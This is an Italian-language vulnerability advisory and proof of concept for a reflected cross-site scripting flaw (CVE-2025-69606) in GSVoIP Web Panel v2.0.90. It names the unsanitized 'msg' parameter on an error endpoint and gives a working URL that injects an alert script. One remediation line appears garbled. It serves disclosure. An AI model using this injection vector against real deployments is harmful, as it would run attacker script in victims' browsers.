
Proof-of-concept di XSS riflesso per CVE-2025-69606 in GSVoIP Web Panel v2.0.90. Dimostra l'esecuzione remota non autenticata di JavaScript tramite il parametro `msg` non sanificato.
Gravità: Media | CWE: CWE-79 | Richiede Autenticazione: No | Vettore: Remoto
È stata identificata una vulnerabilità Cross-Site Scripting (XSS) Riflessa nel Pannello Web GSVoIP (v2.0.90). Il parametro msg dell'endpoint di errore non sanifica l'input controllato dall'utente prima di rifletterlo nella risposta HTML, consentendo l'esecuzione arbitraria di JavaScript nel browser della vittima.
| Campo | Dettagli |
|---|---|
| Prodotto | Pannello Web GSVoIP |
| Versione | 2.0.90 (probabilmente versioni precedenti) |
| Venditore | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Cross-Site Scripting |
| Vettore di Attacco | Remoto / Rete |
| Autenticazione | Non richiesta |
GET /painel/gateways.php/error?msg=<payload>
Il parametro msg viene riflesso direttamente nella risposta HTML senza sanificazione o codifica dell'output.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
Decodificato:
<script>alert(1)</script>
Quando si accede all'URL manipolato, il payload iniettato viene eseguito nel browser della vittima:
alert(1)
msg.script-src restrittive.| Passo | Evento |
|---|---|
| 1 | Vulnerabilità scoperta e segnalata da Luiz Eduardo |
| 2 | Assegnato CVE: CVE-2025-69606 |
| 3 | Divulgazione pubblica |
Scoperta e segnalata da Luiz Eduardo
CVE-2025-69606 · CWE-79 · Pannello Web GSVoIP v2.0.90